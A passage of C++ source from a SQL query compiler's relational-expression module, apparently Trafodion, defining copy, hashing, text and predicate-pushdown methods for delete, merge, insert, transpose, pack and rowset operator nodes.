getUpdTableNameText()); } RelExpr * MergeUpdate::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { MergeUpdate *result; if (derivedNode == NULL) result = new (outHeap) MergeUpdate(getTableName(), getTableDesc(), getOperatorType(), child(0), NULL, insertCols(), insertValues(), outHeap, where_); else result = (MergeUpdate *) derivedNode; if (xformedUpsert()) result->setXformedUpsert(); return Update::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class Delete // ----------------------------------------------------------------------- Delete::Delete(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *newRecExpr, ItemExpr *currOfCursorName, ConstStringList * csl, CollHeap *oHeap) : GenericUpdate(name,tabId,otype,child,newRecExpr,currOfCursorName,oHeap), isFastDelete_(FALSE), csl_(csl),estRowsAccessed_(0) { setCacheableNode(CmpMain::BIND); } Delete::~Delete() {} const NAString Delete::getText() const { NAString text("delete",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * Delete::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Delete *result; if (derivedNode == NULL) result = new (outHeap) Delete(getTableName(), getTableDesc(), getOperatorType(), NULL, NULL, NULL, csl_, outHeap); else result = (Delete *) derivedNode; result->isFastDelete_ = isFastDelete_; result->csl() = csl(); result->setEstRowsAccessed(getEstRowsAccessed()); return GenericUpdate::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class MergeDelete // ----------------------------------------------------------------------- MergeDelete::MergeDelete(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *insertCols, ItemExpr *insertValues, CollHeap *oHeap) : Delete(name,tabId,otype,child,NULL,NULL,NULL,oHeap), 
insertCols_(insertCols), insertValues_(insertValues) { setCacheableNode(CmpMain::BIND); setIsMergeDelete(TRUE); // if there is a WHERE NOT MATCHED INSERT action, then the scan // has to take place in the merge node at run time, so we have // to suppress the TSJ transformation on this node if (insertValues) setNoFlow(TRUE); } MergeDelete::~MergeDelete() {} const NAString MergeDelete::getText() const { NAString text("merge_delete",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * MergeDelete::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { MergeDelete *result; if (derivedNode == NULL) result = new (outHeap) MergeDelete(getTableName(), getTableDesc(), getOperatorType(), child(0), insertCols(), insertValues(), outHeap); else result = (MergeDelete *) derivedNode; return Delete::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class InsertCursor // ----------------------------------------------------------------------- InsertCursor::~InsertCursor() {} NABoolean InsertCursor::isLogical() const { return FALSE; } NABoolean InsertCursor::isPhysical() const { return TRUE; } const NAString InsertCursor::getText() const { NAString text("insert", CmpCommon::statementHeap()); if ((insertType_ == VSBB_INSERT_SYSTEM) || (insertType_ == VSBB_INSERT_USER)) text = text + "_vsbb"; else if ((insertType_ == VSBB_LOAD) || (insertType_ == VSBB_LOAD_APPEND) || (insertType_ == VSBB_LOAD_NO_DUP_KEY_CHECK) || (insertType_ == VSBB_LOAD_APPEND_NO_DUP_KEY_CHECK)) text = text + "_sidetree"; else if (insertType_ == VSBB_LOAD_AUDITED) text = text + "_sidetree_audited"; text = text + " (physical)"; return (text + " " + getUpdTableNameText()); } RelExpr * InsertCursor::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) InsertCursor(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = 
derivedNode; return Insert::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class HiveInsert // ----------------------------------------------------------------------- const NAString HiveInsert::getText() const { NAString text("hive_insert", CmpCommon::statementHeap()); text += " (physical)"; return (text + " " + getUpdTableNameText()); } RelExpr * HiveInsert::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) HiveInsert(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Insert::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class HbaseInsert // ----------------------------------------------------------------------- const NAString HbaseInsert::getText() const { NABoolean isSeabase = (getTableDesc() && getTableDesc()->getNATable() ? 
getTableDesc()->getNATable()->isSeabaseTable() : FALSE); NAString text; if (NOT isSeabase) text = "hbase_"; else text = "trafodion_"; if (isUpsert()) { if (getInsertType() == Insert::UPSERT_LOAD) { if (getIsTrafLoadPrep()) text += "load_preparation"; else text += "load"; } else if (vsbbInsert()) text += "vsbb_upsert"; else text += "upsert"; } else { if (vsbbInsert()) text += "vsbb_upsert"; else text += "insert"; } return (text + " " + getUpdTableNameText()); } RelExpr * HbaseInsert::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseInsert *result; if (derivedNode == NULL) result = new (outHeap) HbaseInsert(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = (HbaseInsert *) derivedNode; result->returnRow_ = returnRow_; return Insert::copyTopNode(result, outHeap); } RelExpr * HBaseBulkLoadPrep::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) HbaseInsert(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Insert::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class UpdateCursor // ----------------------------------------------------------------------- UpdateCursor::~UpdateCursor() {} NABoolean UpdateCursor::isLogical() const { return FALSE; } NABoolean UpdateCursor::isPhysical() const { return TRUE; } const NAString UpdateCursor::getText() const { NAString text("cursor_update",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * UpdateCursor::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) UpdateCursor(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Update::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member 
functions for class DeleteCursor // ----------------------------------------------------------------------- DeleteCursor::~DeleteCursor() {} NABoolean DeleteCursor::isLogical() const { return FALSE; } NABoolean DeleteCursor::isPhysical() const { return TRUE; } const NAString DeleteCursor::getText() const { NAString text("cursor_delete",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * DeleteCursor::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) DeleteCursor(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Delete::copyTopNode(result, outHeap); } ///////////////////////////////////////////////////////////////////// void RelExpr::unparse(NAString &result, PhaseEnum /* phase */, UnparseFormatEnum /* form */, TableDesc * tabId) const { result += getText(); #ifndef NDEBUG if (getenv("UNPARSE_FULL")) { if (selection_) { result += "["; selection_->unparse(result /*, phase, form */); result += "]"; } if (predicates_.entries()) { result += "{"; predicates_.unparse(result /*, phase, form */); result += "}"; } } #endif Int32 maxi = getArity(); if (maxi) { result += "("; for (Lng32 i = 0; i < maxi; i++) { if (i > 0) result += ", "; if ( child(i).getPtr() == NULL ) continue; child(i)->unparse(result); } result += ")"; } } // ----------------------------------------------------------------------- // methods for class Transpose // ----------------------------------------------------------------------- // Transpose::~Transpose() ----------------------------------------------- // The destructor // Transpose::~Transpose() { } // Transpose::topHash() -------------------------------------------------- // Compute a hash value for a chain of derived RelExpr nodes. // Used by the Cascade engine as a quick way to determine if // two nodes are identical. 
// Can produce false positives (nodes appear to be identical), // but should not produce false negatives (nodes are definitely different) // // Inputs: none (other than 'this') // // Outputs: A HashValue of this node and all nodes in the // derivation chain below (towards the base class) this node. // HashValue Transpose::topHash() { // Compute a hash value of the derivation chain below this node. // HashValue result = RelExpr::topHash(); // transUnionVector is the only relevant // data members at this point. The other data members do not // live past the binder. // for(CollIndex i = 0; i < transUnionVectorSize(); i++) { result ^= transUnionVector()[i]; } return result; } // Transpose::duplicateMatch() // A more thorough method to compare two RelExpr nodes. // Used by the Cascades engine when the topHash() of two // nodes returns the same hash values. // // Inputs: other - a reference to another node of the same type. // // Outputs: NABoolean - TRUE if this node is 'identical' to the // 'other' node. FALSE otherwise. // // In order to match, this node must match all the way down the // derivation chain to the RelExpr class. // // For the Transpose node, the only relevant data member which // needs to be compared is transUnionVals_. The other data members // do not exist passed the binder. // NABoolean Transpose::duplicateMatch(const RelExpr & other) const { // Compare this node with 'other' down the derivation chain. // if (!RelExpr::duplicateMatch(other)) return FALSE; // Cast the RelExpr to a Transpose node. 
(This must be a Transpose node) // Transpose &o = (Transpose &) other; // If the transUnionVectors are the same size and have the same entries, // then the nodes are identical // if(transUnionVectorSize() != o.transUnionVectorSize()) return FALSE; for(CollIndex i = 0; i < transUnionVectorSize(); i++) { if (!(transUnionVector()[i] == o.transUnionVector()[i])) return FALSE; } return TRUE; } // Transpose::copyTopNode ---------------------------------------------- // Copy a chain of derived nodes (Calls RelExpr::copyTopNode). // Needs to copy all relevant fields. // Used by the Cascades engine. // // Inputs: derivedNode - If Non-NULL this should point to a node // which is derived from this node. If NULL, then this // node is the top of the derivation chain and a node must // be constructed. // // Outputs: RelExpr * - A Copy of this node. // // If the 'derivedNode is non-NULL, then this method is being called // from a copyTopNode method on a class derived from this one. If it // is NULL, then this is the top of the derivation chain and a transpose // node must be constructed. // // In either case, the relevant data members must be copied to 'derivedNode' // and 'derivedNode' is passed to the copyTopNode method of the class // below this one in the derivation chain (RelExpr::copyTopNode() in this // case). // RelExpr * Transpose::copyTopNode(RelExpr *derivedNode, CollHeap *outHeap) { Transpose *result; if (derivedNode == NULL) // This is the top of the derivation chain // Create an empty Transpose node. // result = new (outHeap) Transpose(NULL,NULL,NULL,outHeap); else // A node has already been constructed as a derived class. // result = (Transpose *) derivedNode; // Copy the relavant fields. 
result->transUnionVectorSize_ = transUnionVectorSize(); result->transUnionVector() = new (outHeap) ValueIdList[transUnionVectorSize()]; for(CollIndex i = 0; i < transUnionVectorSize(); i++) { result->transUnionVector()[i] = transUnionVector()[i]; } // copy pointer to expressions // These are not available after bindNode() // if (transValsTree_ != NULL) result->transValsTree_ = transValsTree_->copyTree(outHeap)->castToItemExpr(); if (keyCol_ != NULL) result->keyCol_ = keyCol_->copyTree(outHeap)->castToItemExpr(); // Copy any data members from the classes lower in the derivation chain. // return RelExpr::copyTopNode(result, outHeap); } // Transpose::addLocalExpr() ----------------------------------------------- // Insert into a list of expressions all the expressions of this node and // all nodes below this node in the derivation chain. Insert into a list of // names, all the names of the expressions of this node and all nodes below // this node in the derivation chain. This method is used by the GUI tool // and by the Explain Function to have a common method to get all the // expressions associated with a node. // // Inputs/Outputs: xlist - a list of expressions. // llist - a list of names of expressions. // // The xlist contains a list of all the expressions associated with this // node. The llist contains the names of these expressions. (This lists // must be kept in the same order). // Transpose::addLocalExpr potentially adds the transUnionVals_ expression // ("transpose_union_values"), the transValsTree_ expression // ("transpose_values"), and the keyCol_ expression ("key_column"). // // It then calls RelExpr::addLocalExpr() which will add any RelExpr // expressions to the list. 
// void Transpose::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { for(CollIndex i = 0; i < transUnionVectorSize(); i++) { if (NOT transUnionVector()[i].isEmpty()) { xlist.insert(transUnionVector()[i].rebuildExprTree()); llist.insert("transpose_union_vector"); } } // This is only available as an ItemExpr tree. It is never // stored as a ValueIdSet. This is not available after bindNode(). // if(transValsTree_) { xlist.insert(transValsTree_); llist.insert("transpose_values"); } // This is only available as an ItemExpr tree. It is never // stored as a ValueIdSet. This is not available after bindNode(). // if(keyCol_) { xlist.insert(keyCol_); llist.insert("key_column"); } RelExpr::addLocalExpr(xlist,llist); } // Transpose::getPotentialOutputValues() --------------------------------- // Construct a Set of the potential outputs of this node. // // Inputs: none (other than 'this') // // Outputs: outputValues - a ValueIdSet representing the potential outputs // of this node. // // The potential outputs for the transpose node are the new columns // generated by the transpose node, plus the outputs produced by the // child node. The new columns generated by transpose are the key // column and the value colunms (one for each transpose group). // void Transpose::getPotentialOutputValues(ValueIdSet & outputValues) const { // Make sure the ValueIdSet is empty. // outputValues.clear(); // Add the values generated by the transpose node. // for(CollIndex i = 0; i < transUnionVectorSize(); i++) { outputValues.insertList( transUnionVector()[i] ); } // Add the values produced by the child. // outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); } // Transpose::getPotentialOutputValues() // Transpose::pushdownCoveredExpr() ------------------------------------ // // In order to compute the Group Attributes for a relational operator // an analysis of all the scalar expressions associated with it is // performed. 
The purpose of this analysis is to identify the sources // of the values that each expression requires. As a result of this // analysis values are categorized as external dataflow inputs or // those that can be produced completely by a certain child of the // relational operator. // // This method is invoked on each relational operator. It causes // a) the pushdown of predicates and // b) the recomputation of the Group Attributes of each child. // The recomputation is required either because the child is // assigned new predicates or is expected to compute some of the // expressions that are required by its parent. // // Parameters: // // const ValueIdSet &setOfValuesReqdByParent // IN: a read-only reference to a set of expressions that are // associated with this operator. Typically, they do not // include the predicates. // // ValueIdSet & newExternalInputs // IN : a reference to a set of new external inputs (ValueIds) // that are provided by this operator for evaluating the // the above expressions. // // ValueIdSet & predicatesOnParent // IN : the set of predicates existing on the operator // OUT: a subset of the original predicates. Some of the // predicate factors may have been pushed down to // the operator's children. // // long childIndex // IN : This is an optional parameter. // If supplied, it is a zero-based index for a specific child // on which the predicate pushdown should be attempted. // If not supplied, or a null pointer is supplied, then // the pushdown is attempted on all the children. 
//
// ---------------------------------------------------------------------
void Transpose::pushdownCoveredExpr(const ValueIdSet &outputExpr,
                                    const ValueIdSet &newExternalInputs,
                                    ValueIdSet &predicatesOnParent,
                                    const ValueIdSet *setOfValuesReqdByParent,
                                    Lng32 childIndex
                                    )
{
  ValueIdSet exprOnParent;
  if (setOfValuesReqdByParent)
    exprOnParent = *setOfValuesReqdByParent;

  // Add all the values required for the transpose expressions
  // to the values required by the parent.
  // Don't add the valueIds of the ValueIdUnion nodes, but the
  // valueIds of the contents of the ValueIdUnion nodes.
  //
  for(CollIndex v = 0; v < transUnionVectorSize(); v++) {
    ValueIdList &valIdList = transUnionVector()[v];

    for(CollIndex i = 0; i < valIdList.entries(); i++) {
      // Each list entry is expected to be a ValueIdUnion; push its
      // source values, not the union node itself.
      ValueIdUnion *valIdu = ((ValueIdUnion *)valIdList[i].
                              getValueDesc()->getItemExpr());

      exprOnParent.insertList(valIdu->getSources());
    }
  }

  // Work on a copy so that only the predicates that could NOT be pushed
  // remain in predicatesOnParent afterwards.
  ValueIdSet pushablePredicates(predicatesOnParent);

  RelExpr::pushdownCoveredExpr(outputExpr,
                               newExternalInputs,
                               pushablePredicates,
                               &exprOnParent,
                               childIndex);

  predicatesOnParent.intersectSet(pushablePredicates);
} // Transpose::pushdownCoveredExpr

// Transpose::removeTransValsTree() -------------------------------------
// Return the transValsTree_ ItemExpr tree and set to NULL,
//
// Inputs: none (Other than 'this')
//
// Outputs: ItemExpr * - the value of transValsTree_
//
// Side Effects: Sets the value of transValsTree_ to NULL.
//
// Called by Transpose::bindNode(). The value of transValsTree_ is not
// needed after the binder.
//
const ItemExpr *
Transpose::removeTransValsTree()
{
  ItemExpr *result = transValsTree_;
  transValsTree_ = (ItemExpr *)NULL;
  return result;
}

// Transpose::removeKeyCol() -------------------------------------
// Return the keyCol_ ItemExpr tree and set it to NULL,
//
// Inputs: none (Other than 'this')
//
// Outputs: ItemExpr * - the value of keyCol_
//
// Side Effects: Sets the value of keyCol_ to NULL.
//
// Call by Transpose::bindNode().  The value of keyCol_ is not
// needed after the binder.
//
const ItemExpr *
Transpose::removeKeyCol()
{
  ItemExpr *result = keyCol_;
  keyCol_ = (ItemExpr *)NULL;
  return result;
}

// This method is used in case there are expressions in the Transpose column
// list. It traverses through the expression to get the column under them
// If it is a unary expression, it gets the column directly below the expression.
// If the expression has two children, it goes through both the children
// to see which one of them has a higher UEC. It returns the ValueId of that
// column. This column is later used to determine the UEC of the final
// transpose column.
ValueId Transpose::getSourceColFromExprForUec(ValueId sourceValId,
                                              const ColStatDescList & childColStatsList)
{
  if (sourceValId.getItemExpr()->getOperatorType() == ITM_VEG_REFERENCE)
    return sourceValId;

  // Gather all VEG references embedded in the expression.
  ValueIdSet vegCols;
  sourceValId.getItemExpr()->
    findAll(ITM_VEG_REFERENCE, vegCols, TRUE, TRUE);

  // case 1 : expression with a constant, return sourceValId
  // case 2 :(only one expr) concentrates on simple expressions only
  // case 3 :(Multiple exprs) Expression of type EXPR1 OP EXPR2
  // where EXPR1 , EXPR2 is VEGREF or EXPR we will assume the max UEC
  // amidst the list of base columns found will be used.
  // This is an approximation but better than the worst case.
  if (vegCols.entries() == 0)
  {
    // case 1
    return sourceValId;
  }

  if(vegCols.entries() == 1)
  {
    // case 2
    // There is only one; get that.
    vegCols.getFirst(sourceValId);
  }
  else
  {
    //case 3
    //Initialize for safety.
    vegCols.getFirst(sourceValId);
    //CostScalars are initialized by their constructor to zero.
    CostScalar currentMaxUEC,currentUEC;
    CollIndex index = NULL_COLL_INDEX;

    for(ValueId currentValId = vegCols.init()
        ;vegCols.next(currentValId)
        ;vegCols.advance(currentValId))
    {
      index = NULL_COLL_INDEX;
      childColStatsList.getColStatDescIndex(index, currentValId);
      // Skip columns with no statistics available.
      if (index == NULL_COLL_INDEX)
        continue;
      currentUEC = childColStatsList[index]->getColStats()
        ->getTotalUec();
      //get the UEC and find the max and corresponding valueID
      //and assign it to sourceValId.
      if(currentUEC > currentMaxUEC)
      {
        currentMaxUEC = currentUEC;
        sourceValId = currentValId;
      }
    }// end of for
  }//end of else

  return sourceValId;
}

// The destructor
//
PhysTranspose::~PhysTranspose()
{
}

// PhysTranspose::copyTopNode ----------------------------------------------
// Copy a chain of derived nodes (Calls Transpose::copyTopNode).
// Needs to copy all relevant fields.
// Used by the Cascades engine.
//
// Inputs: derivedNode - If Non-NULL this should point to a node
//          which is derived from this node.  If NULL, then this
//          node is the top of the derivation chain and a node must
//          be constructed.
//
// Outputs: RelExpr * - A Copy of this node.
//
// If the 'derivedNode is non-NULL, then this method is being called
// from a copyTopNode method on a class derived from this one. If it
// is NULL, then this is the top of the derivation chain and a transpose
// node must be constructed.
//
// In either case, the relevant data members must be copied to 'derivedNode'
// and 'derivedNode' is passed to the copyTopNode method of the class
// below this one in the derivation chain (Transpose::copyTopNode() in this
// case).
//
RelExpr * PhysTranspose::copyTopNode(RelExpr *derivedNode, CollHeap *outHeap)
{
  PhysTranspose *result;

  if (derivedNode == NULL)
    // This is the top of the derivation chain
    // Generate an empty PhysTranspose node.
    //
    result = new (outHeap) PhysTranspose(NULL,outHeap);
  else
    // A node has already been constructed as a derived class.
    //
    result = (PhysTranspose *) derivedNode;

  // PhysTranspose has no data members.

  // Copy any data members from the classes lower in the derivation chain.
  //
  return Transpose::copyTopNode(result, outHeap);
}

// -----------------------------------------------------------------------
// methods for class Pack
// -----------------------------------------------------------------------

// Constructor
Pack::Pack(ULng32 pf,
           RelExpr* child,
           ItemExpr* packingExprTree,
           CollHeap* oHeap)
  : RelExpr(REL_PACK,child,NULL,oHeap),
    packingFactorLong_(pf),
    packingFactorTree_(NULL),
    packingExprTree_(packingExprTree)
{
  // Pack nodes are never cached query plans.
  setNonCacheable();
  packingFactor().clear();
  packingExpr().clear();
  requiredOrder_.clear();
}

// Destructor.
Pack::~Pack()
{
}

// -----------------------------------------------------------------------
// Pack:: some Accessors/Mutators.
// -----------------------------------------------------------------------

// Detach and return the packing-factor parse tree (ownership transfers
// to the caller; the member is reset to NULL).
ItemExpr* Pack::removePackingFactorTree()
{
  ItemExpr* pf = packingFactorTree_;
  packingFactorTree_ = NULL;
  return pf;
}

// Detach and return the packing-expression parse tree (ownership
// transfers to the caller; the member is reset to NULL).
ItemExpr* Pack::removePackingExprTree()
{
  ItemExpr* pe = packingExprTree_;
  packingExprTree_ = NULL;
  return pe;
}

// -----------------------------------------------------------------------
// Pack::getText()
// -----------------------------------------------------------------------
const NAString Pack::getText() const
{
  return "PACK";
}

// -----------------------------------------------------------------------
// Pack::topHash()
// -----------------------------------------------------------------------
HashValue Pack::topHash()
{
  // The base class's topHash deals with inputs/outputs and operator type.
  HashValue result = RelExpr::topHash();

  // Packing factor and packing expression are the differentiating factors.
  result ^= packingFactor();
  result ^= packingExpr();
  result ^= requiredOrder();

  return result;
}

// -----------------------------------------------------------------------
// Pack::duplicateMatch()
// -----------------------------------------------------------------------
NABoolean Pack::duplicateMatch(const RelExpr& other) const
{
  // Assume optimizer already matches inputs/outputs in Group Attributes.
  // Base class checks for operator type, predicates and children.
  if(NOT RelExpr::duplicateMatch(other)) return FALSE;

  // Base class implementation already makes sure other is a Pack node.
  Pack& otherPack = (Pack &) other;

  // If the required order keys are not the same
  // then the nodes are not identical
  //
  if (!(requiredOrder() == otherPack.requiredOrder()))
    return FALSE;

  // Packing factor is the only remaining thing to check.
  return (packingFactor_ == otherPack.packingFactor() AND
          packingExpr_ == otherPack.packingExpr());
}

// -----------------------------------------------------------------------
// Pack::copyTopNode()
// -----------------------------------------------------------------------
RelExpr* Pack::copyTopNode(RelExpr* derivedNode, CollHeap* outHeap)
{
  Pack* result;

  // This the real node we want to copy. Construct a new Pack node.
  if(derivedNode == NULL)
  {
    result = new (outHeap) Pack (packingFactorLong(),NULL,NULL,outHeap);
    result->packingFactor() = packingFactor();
    result->packingExpr() = packingExpr();
    //result->setRequiredOrder(requiredOrder());
    result->requiredOrder() = requiredOrder();
    result->setFirstNRows(getFirstNRows());
  }
  else
  // ---------------------------------------------------------------------
  // The real node we want to copy is of a derived class. The duplicate
  // has already been made and stored in derived node. All I need to do is
  // to copy the members stored with this base class.
  // ---------------------------------------------------------------------
  {
    result = (Pack *) derivedNode;
    result->packingFactorLong() = packingFactorLong();
    result->packingFactor() = packingFactor();
    result->packingExpr() = packingExpr();
    result->requiredOrder() = requiredOrder();
    result->setFirstNRows(getFirstNRows());
  }

  // Call base class to make copies of its own data members.
  return RelExpr::copyTopNode(result,outHeap);
}

// -----------------------------------------------------------------------
// Pack::getPotentialOutputValues()
// -----------------------------------------------------------------------
void Pack::getPotentialOutputValues(ValueIdSet& outputValues) const
{
  // Just the outputs of the packing expression.
  outputValues.clear();
  outputValues.insertList(packingExpr_);
}

// -----------------------------------------------------------------------
// Pack::getNonPackedExpr() returns the non-packed sub-expressions of the
// packing expression.
// -----------------------------------------------------------------------
void Pack::getNonPackedExpr(ValueIdSet& vidset)
{
  for(CollIndex i = 0; i < packingExpr().entries(); i++)
  {
    // Each packing-expression entry wraps its original (non-packed)
    // expression as child(0); collect those children.
    ItemExpr* packItem = packingExpr().at(i).getItemExpr();
    vidset.insert(packItem->child(0)->getValueId());
  }
}

// -----------------------------------------------------------------------
// Pack::pushdownCoveredExpr() needs to add the sub-expressions of the
// packing expression to nonPredExprOnOperator and then make use of the
// default implementation. It is expected in the first phase, nothing
// can be pushed down though.
// -----------------------------------------------------------------------
void Pack::pushdownCoveredExpr(const ValueIdSet& outputExpr,
                               const ValueIdSet& newExternalInputs,
                               ValueIdSet& predOnOperator,
                               const ValueIdSet* nonPredExprOnOperator,
                               Lng32 childId)
{
  // The operator itself needs the non-packed sub-expressions, the
  // caller-supplied non-predicate expressions (if any), and the
  // required-order keys.
  ValueIdSet exprNeededByOperator;
  getNonPackedExpr(exprNeededByOperator);
  if (nonPredExprOnOperator)
    exprNeededByOperator += *nonPredExprOnOperator;
  exprNeededByOperator.insertList(requiredOrder());

  // Delegate the actual pushdown / Group Attribute recomputation.
  RelExpr::pushdownCoveredExpr(outputExpr,
                               newExternalInputs,
                               predOnOperator,
                               &exprNeededByOperator,
                               childId);
}

// -----------------------------------------------------------------------
// Pack::addLocalExpr() adds the packing expressions to be displayed by
// the GUI debugger.
// -----------------------------------------------------------------------
void Pack::addLocalExpr(LIST(ExprNode*)& xlist, LIST(NAString)& llist) const
{
  // Unbound parse tree, present only before bindNode().
  if(packingExprTree_ != NULL)
  {
    xlist.insert(packingExprTree_);
    llist.insert("pack_expr_tree");
  }

  if (requiredOrder().entries() > 0)
  {
    xlist.insert(requiredOrder().rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("required_order");
  }

  // Bound packing expression, available after bindNode().
  if(NOT packingExpr_.isEmpty())
  {
    xlist.insert(packingExpr_.rebuildExprTree());
    llist.insert("pack_expr");
  }

  RelExpr::addLocalExpr(xlist,llist);
}

// -----------------------------------------------------------------------
// methods for class PhyPack
// -----------------------------------------------------------------------

// Destructor.
PhyPack::~PhyPack()
{
}

// -----------------------------------------------------------------------
// PhyPack::copyTopNode()
// -----------------------------------------------------------------------
RelExpr* PhyPack::copyTopNode(RelExpr* derivedNode, CollHeap* outHeap)
{
  PhyPack* result;

  // This the real node we want to copy. Construct a new PhyPack node.
  if(derivedNode == NULL)
  {
    result = new (outHeap) PhyPack (0,NULL,outHeap);
  }
  else
  // ---------------------------------------------------------------------
  // The real node we want to copy is of a derived class. The duplicate
  // has already been made and store in derived node. All I need to do is
  // to copy the members stored with this base class.
  // ---------------------------------------------------------------------
  {
    result = (PhyPack *) derivedNode;
  }

  // Tell base class to copy its members. PhyPack has no added members.
  return Pack::copyTopNode(result,outHeap);
}

// -----------------------------------------------------------------------
// methods for class Rowset
// -----------------------------------------------------------------------

// Constructor
Rowset::Rowset(ItemExpr *inputHostvars, ItemExpr *indexExpr,
               ItemExpr *sizeExpr, RelExpr * childExpr, CollHeap* oHeap)
  : RelExpr(REL_ROWSET,childExpr,NULL,oHeap),
    inputHostvars_(inputHostvars),
    indexExpr_(indexExpr),
    sizeExpr_(sizeExpr)
{
  // Rowset plans are never cached.
  setNonCacheable();
} // Rowset::Rowset()

// Destructor.
Rowset::~Rowset()
{
} // Rowset::~Rowset()

RelExpr * Rowset::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap)
{
  Rowset *result;

  if (derivedNode == NULL)
    // Top of the derivation chain: build a fresh Rowset sharing the
    // same host-variable / index / size expression pointers.
    result = new (oHeap) Rowset(inputHostvars_, indexExpr_, sizeExpr_,
                                NULL, oHeap);
  else
  {
    result = (Rowset *) derivedNode;
  }

  return RelExpr::copyTopNode(result,oHeap);
} // Rowset::copyTopNode()

Int32 Rowset::getArity() const
{
  return 0; // This is a leaf node
} // Rowset::getArity()

// Build the display/EXPLAIN text: "RowSet <size> (hv1, hv2, ...) [KEY BY col]".
const NAString Rowset::getText() const
{
  NAString result("RowSet",CmpCommon::statementHeap());

  if (sizeExpr_) {
    if (sizeExpr_->getOperatorType() == ITM_CONSTANT) {
      char str[TEXT_DISPLAY_LENGTH];
      sprintf(str, " " PF64,
              ((ConstValue *)sizeExpr_)->getExactNumericValue());
      result += str;
    }
    else if (sizeExpr_->getOperatorType() == ITM_HOSTVAR)
      result += " " + ((HostVar *)sizeExpr_)->getName();
    else
      // Unknown size-expression form.
      result += " ??";
  }

  result += " (";
  // Walk the right-linked list of input host variables.
  for (ItemExpr *hostVarTree = inputHostvars_;
       hostVarTree != NULL;
       hostVarTree = hostVarTree->child(1)) {
    if (inputHostvars_ != hostVarTree)
      result += ", ";
    HostVar *hostVar = (HostVar *)hostVarTree->getChild(0);
    result += hostVar->getName();
  }
  result += ")";

  if (indexExpr_)
    result += ("KEY BY " +
               ((ColReference *)indexExpr_)->getColRefNameObj().getColName());

  return result;
}

// returns the name of the exposed index of the Rowset
const NAString Rowset::getIndexName() const
{
  // A hack to check if the Rowset has an index expression
  NAString result("",CmpCommon::statementHeap());
  if (indexExpr_)
    result += ((ColReference *)indexExpr_)->getColRefNameObj().getColName();
  return(result);
}

// -----------------------------------------------------------------------
// methods for class RowsetRowwise
// -----------------------------------------------------------------------

// Constructor
RowsetRowwise::RowsetRowwise(RelExpr * childExpr,
                             CollHeap* oHeap)
  : Rowset(NULL, NULL, NULL, childExpr, oHeap)
{
} // RowsetRowwise::RowsetRowwise()

RelExpr * RowsetRowwise::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap)
{
  Rowset *result;

  if (derivedNode == NULL)
    result = new (oHeap) RowsetRowwise(NULL, oHeap);
  else
  {
    result = (RowsetRowwise *) derivedNode;
  }

  return Rowset::copyTopNode(result,oHeap);
} // RowsetRowwise::copyTopNode()

const NAString RowsetRowwise::getText() const
{
  NAString result("RowSet Rowwise",CmpCommon::statementHeap());

  return result;
}

// Unlike the base Rowset (a leaf), a rowwise rowset has one child.
Int32 RowsetRowwise::getArity() const
{
  return 1;
} // RowsetRowwise::getArity()

// Constructor.  All buffer-attribute flags default to FALSE.
RowsetFor::RowsetFor(RelExpr *child,
                     ItemExpr *inputSizeExpr,
                     ItemExpr *outputSizeExpr,
                     ItemExpr *indexExpr,
                     ItemExpr *maxSizeExpr,
                     ItemExpr *maxInputRowlen,
                     ItemExpr *rwrsBuffer,
                     ItemExpr *partnNum,
                     CollHeap *oHeap)
  : RelExpr(REL_ROWSETFOR,child,NULL,oHeap),
    inputSizeExpr_(inputSizeExpr),
    outputSizeExpr_(outputSizeExpr),
    indexExpr_(indexExpr),
    maxSizeExpr_(maxSizeExpr),
    maxInputRowlen_(maxInputRowlen),
    rwrsBuffer_(rwrsBuffer),
    partnNum_(partnNum),
    rowwiseRowset_(FALSE),
    packedFormat_(FALSE),
    compressed_(FALSE),
    dcompressInMaster_(FALSE),
    compressInMaster_(FALSE),
    partnNumInBuffer_(FALSE)
{
  setNonCacheable();
}

// Destructor.
RowsetFor::~RowsetFor()
{
}

RelExpr * RowsetFor::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap)
{
  RowsetFor *result;

  if (derivedNode == NULL)
    result = new (oHeap) RowsetFor(NULL, inputSizeExpr_, outputSizeExpr_,
                                   indexExpr_, maxSizeExpr_, maxInputRowlen_,
